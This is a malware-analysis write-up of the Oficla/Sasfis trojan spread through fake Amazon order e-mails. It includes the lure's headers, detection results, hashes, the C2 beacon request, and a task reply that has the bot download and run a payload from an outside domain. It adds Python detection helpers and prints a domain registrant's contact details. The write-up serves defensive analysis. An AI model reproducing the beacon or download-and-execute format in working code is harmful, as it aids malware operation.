Oficla/Sasfis malware is pretty common these days in Amazon shopping spam e-mails. The idea is old and simple: you receive an e-mail with an attachment, the attachment is a zip file, and once you extract and run the executable inside it you become infected. Below we show some of the details of this attack:
You will receive a mail similar to this one:
From: “Amazon Manager Jarvis Schwartz” <support.order@amazon.com>
X-Mailer: The Bat! (v3.71.01) Educational
Reply-To: <cut>@peoplesuccess.com
X-Priority: 3 (Normal)
Message-ID: <random_number1.random_number2@peoplesuccess.com>
To: <cut>
Subject: Your order has been paid! Parcel NR.<random number>.
MIME-Version: 1.0
Hi!
Thank you for shopping at Amazon.com
We have successfully received your payment.
Your order has been shipped to your billing address.
You have ordered "Samsung GO N310"
You can find your tracking number in attached to the e-mail document.
Print the postal label to get your package.
We hope you enjoy your order!
Amazon.com
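The headers above already give a defender enough to flag the lure without opening the attachment: the From address claims amazon.com, while both Reply-To and Message-ID point at peoplesuccess.com, and a transactional notification from a large retailer arrives with a desktop mail client's X-Mailer. The following added example (ours, not the original post's code) runs those consistency checks over a sample message constructed from the headers shown; the recipient and the Reply-To local part, which the post cuts out, are replaced with placeholders.

```python
"""Header-consistency checks for the Amazon lure (added example).

The sample message is constructed from the headers shown in the post; the
addresses the post marks <cut> are replaced with placeholder values.
"""
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: headers as shown in the post, placeholders where it says <cut>.
SAMPLE_LURE = """From: "Amazon Manager Jarvis Schwartz" <support.order@amazon.com>
X-Mailer: The Bat! (v3.71.01) Educational
Reply-To: <placeholder@peoplesuccess.com>
X-Priority: 3 (Normal)
Message-ID: <1234567.7654321@peoplesuccess.com>
To: <victim@example.com>
Subject: Your order has been paid! Parcel NR.123456.
MIME-Version: 1.0

Hi!
Thank you for shopping at Amazon.com
"""

# Constructed clean counterpart: every domain agrees, no desktop mailer header.
SAMPLE_CLEAN = """From: "Example Shop" <orders@example.com>
Reply-To: <orders@example.com>
Message-ID: <abc123@example.com>
To: <victim@example.com>
Subject: Your order

Thanks.
"""


def _addr_domain(header_value):
    """Lower-cased domain of the first address in a From/Reply-To header ('' if none)."""
    _display, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _msgid_domain(msgid):
    """Domain to the right of '@' inside a <left@right> Message-ID ('' if none)."""
    inner = (msgid or "").strip().strip("<>")
    return inner.rsplit("@", 1)[-1].lower() if "@" in inner else ""


def check_headers(raw_message):
    """Return a list of findings; an empty list means no inconsistency was seen."""
    msg = message_from_string(raw_message)
    from_dom = _addr_domain(msg.get("From"))
    reply_dom = _addr_domain(msg.get("Reply-To"))
    msgid_dom = _msgid_domain(msg.get("Message-ID"))
    findings = []
    # Replies would go to a domain other than the one the sender claims.
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    # The Message-ID was generated on a host outside the claimed sender domain.
    if msgid_dom and msgid_dom != from_dom:
        findings.append(f"Message-ID domain {msgid_dom} differs from From domain {from_dom}")
    # Weak indicator: an automated order notice sent from an end-user mail client.
    if "The Bat!" in msg.get("X-Mailer", ""):
        findings.append("X-Mailer identifies a desktop mail client for a transactional notification")
    return findings


if __name__ == "__main__":
    for finding in check_headers(SAMPLE_LURE):
        print("LURE:", finding)
    print("CLEAN:", check_headers(SAMPLE_CLEAN))
```

The two domain comparisons are the ones worth alerting on; the X-Mailer check is only a supporting signal, since legitimate mail from that client exists, which is why it is kept separate from the other two findings.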
The attached document is actually a malicious file as you can see below:
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| a-squared | 4.5.0.50 | 2010.04.10 | Win32.Outbreak!IK |
| AhnLab-V3 | 5.0.0.2 | 2010.04.10 | Dropper/Agent.57344.CY |
| AntiVir | 7.10.6.55 | 2010.04.09 | - |
| Antiy-AVL | 2.0.3.7 | 2010.04.09 | - |
| Authentium | 5.2.0.5 | 2010.04.10 | W32/FraudLoad.C!Generic |
| Avast | 4.8.1351.0 | 2010.04.10 | Win32:Trojan-gen |
| Avast5 | 5.0.332.0 | 2010.04.10 | Win32:Trojan-gen |
| AVG | 9.0.0.787 | 2010.04.10 | Crypt.SMM |
| BitDefender | 7.2 | 2010.04.10 | Trojan.Dropper.Agent.UXI |
| CAT-QuickHeal | 10.00 | 2010.04.10 | - |
| ClamAV | 0.96.0.3-git | 2010.04.10 | - |
| Comodo | 4560 | 2010.04.10 | Heur.Suspicious |
| DrWeb | 5.0.2.03300 | 2010.04.11 | Trojan.Oficla.37 |
| eSafe | 7.0.17.0 | 2010.04.08 | - |
| eTrust-Vet | 35.2.7418 | 2010.04.09 | - |
| F-Prot | 4.5.1.85 | 2010.04.10 | W32/FraudLoad.C!Generic |
| F-Secure | 9.0.15370.0 | 2010.04.10 | Trojan-Downloader:W32/Bredolab.XQ |
| Fortinet | 4.0.14.0 | 2010.04.10 | - |
| GData | 19 | 2010.04.10 | Trojan.Dropper.Agent.UXI |
| Ikarus | T3.1.1.80.0 | 2010.04.10 | Win32.Outbreak |
| Jiangmin | 13.0.900 | 2010.04.10 | - |
| Kaspersky | 7.0.0.125 | 2010.04.11 | Trojan.Win32.Sasfis.albj |
| McAfee-GW-Edition | 6.8.5 | 2010.04.09 | - |
| Microsoft | 1.5605 | 2010.04.10 | Trojan:Win32/Oficla.M |
| NOD32 | 5016 | 2010.04.10 | Win32/Oficla.FO |
| Norman | 6.04.11 | 2010.04.10 | - |
| nProtect | 2009.1.8.0 | 2010.04.06 | - |
| Panda | 10.0.2.2 | 2010.04.10 | - |
| PCTools | 7.0.3.5 | 2010.04.11 | Backdoor.Bredolab |
| Prevx | 3.0 | 2010.04.11 | Medium Risk Malware |
| Rising | 22.42.04.03 | 2010.04.09 | - |
| Sophos | 4.52.0 | 2010.04.10 | Troj/Bredo-BW |
| Sunbelt | 6162 | 2010.04.11 | Trojan.Win32.Generic!BT |
| Symantec | 20091.2.0.41 | 2010.04.11 | Trojan.Sasfis |
| TheHacker | 6.5.2.0.259 | 2010.04.11 | Trojan/Sasfis.albj |
| TrendMicro | 9.120.0.1004 | 2010.04.10 | PAK_Generic.001 |
| VBA32 | 3.12.12.4 | 2010.04.09 | - |
| ViRobot | 2010.4.10.2270 | 2010.04.10 | Trojan.Win32.Sasfis.57344.C |
| VirusBuster | 5.0.27.0 | 2010.04.10 | - |
Additional information:
File size: 57344 bytes
MD5: 4b32b4248e0910c5783733e67da73454
SHA1: 5d7d2cb90b47a0365209bb3834b38626e5dc4e54
(via VirusTotal)
This is a UPX-packed file. Once executed, it drops a DLL named "lgou.rlo" into the %system32% folder (the name may vary between malware variants); the DLL is also detected as Oficla/Sasfis.
The malware then contacts the domain postfolkovs.ru, which has the following registration information:
domain: POSTFOLKOVS.RU
nserver: ns1.postfolkovs.ru. 195.78.108.200
nserver: ns2.postfolkovs.ru. 195.78.108.201
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
phone: +79766512311
e-mail: vadim.rinatovich@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2010.03.29
The request details are:
GET /markus/bb.php?v=<number>&id=<number>&b=<digits and letters>&tm=<number> HTTP/1.1
User-Agent: Opera\9.64
Host: postfolkovs.ru
As you can see, it disguises itself as the Opera browser. The response from the server has the following form:
[info]runurl:hxxp://knowingthetruth.org/templates/rhuk_solarflare_ii/<malwarefile>.exe|taskid:45|delay:45|upd:0|backurls:[/info]
It then tries to download and execute a malicious file hosted on the knowingthetruth.org domain. So far, several versions of rogue antivirus products have been observed being downloaded from that location.
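Both the check-in request and the `[info]...[/info]` task reply above are easy to match once you know their shape, which is what a proxy or IDS analyst would turn this write-up into. The following added example (ours, not code from the post) does two things: it picks the Oficla/Sasfis beacon out of constructed proxy log lines by its `bb.php` query parameters and the malformed `Opera\9.64` User-Agent shown above, and it parses the task reply into its fields so the download host can be pulled out for blocking. The log line format, the client IPs and the parameter values are constructed; the `<malwarefile>` name the post elides is replaced by a placeholder.

```python
"""Detection helpers for the Oficla/Sasfis check-in and task reply (added example).

Log line format and all sample values are constructed for this example.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters seen in the post's beacon: /markus/bb.php?v=..&id=..&b=..&tm=..
BEACON_PARAMS = {"v", "id", "b", "tm"}
# User-Agent as observed in the post. Note the backslash: a genuine Opera UA
# starts with "Opera/9.64 (...)", so the odd separator is itself a signal.
BEACON_UA = re.compile(r"^Opera\\9\.64$")

# Constructed proxy log lines: <client-ip> <host> <method> <request-target> "<user-agent>"
SAMPLE_LOG = [
    '10.0.0.5 postfolkovs.ru GET /markus/bb.php?v=200&id=1234&b=ab12cd34&tm=1 "Opera\\9.64"',
    '10.0.0.7 www.example.com GET /index.html "Mozilla/5.0 (Windows NT 6.1)"',
    '10.0.0.9 postfolkovs.ru GET /markus/bb.php?v=200&id=99 "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.2.15"',
]
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed task reply in the form the post shows; "sample.exe" is a placeholder name.
SAMPLE_REPLY = ("[info]runurl:hxxp://knowingthetruth.org/templates/rhuk_solarflare_ii/sample.exe"
                "|taskid:45|delay:45|upd:0|backurls:[/info]")


def is_beacon(line):
    """True when a log line has the bb.php parameter set and the observed UA."""
    m = LOG_RE.match(line)
    if not m:
        return False
    _ip, _host, _method, target, ua = m.groups()
    parts = urlsplit(target)
    params = set(parse_qs(parts.query))
    return (parts.path.endswith("/bb.php")
            and BEACON_PARAMS <= params
            and BEACON_UA.match(ua) is not None)


def find_beacons(lines):
    """Return the subset of log lines that look like the check-in."""
    return [line for line in lines if is_beacon(line)]


def parse_task(reply):
    """Parse '[info]key:value|key:value|...[/info]' into a dict, or None if absent.

    Fields are split on '|' and each field on its first ':' only, so the
    'hxxp://' scheme in runurl survives intact.
    """
    m = re.search(r"\[info\](.*?)\[/info\]", reply, re.S)
    if not m:
        return None
    task = {}
    for field in m.group(1).split("|"):
        if not field:
            continue
        key, _sep, value = field.partition(":")
        task[key.strip()] = value.strip()
    return task


def payload_host(task):
    """Host the bot is told to fetch the next stage from (for blocklisting)."""
    return urlsplit(task.get("runurl", "")).netloc.lower()


if __name__ == "__main__":
    for line in find_beacons(SAMPLE_LOG):
        print("BEACON:", line)
    task = parse_task(SAMPLE_REPLY)
    print("task:", task)
    print("payload host:", payload_host(task))
```

The third sample line is deliberately a near miss: same host and script, but only two query parameters and a well-formed Opera User-Agent, so it is not reported. Matching on the full parameter set plus the User-Agent keeps the rule from firing on unrelated `bb.php` endpoints.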
The domain details for knowingthetruth.org are as follows:
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:KNOWINGTHETRUTH.ORG@domainsbyproxy.com
Unfortunately we hit a dead end here, because the owner's details are hidden behind the private registration service offered by domainsbyproxy.com.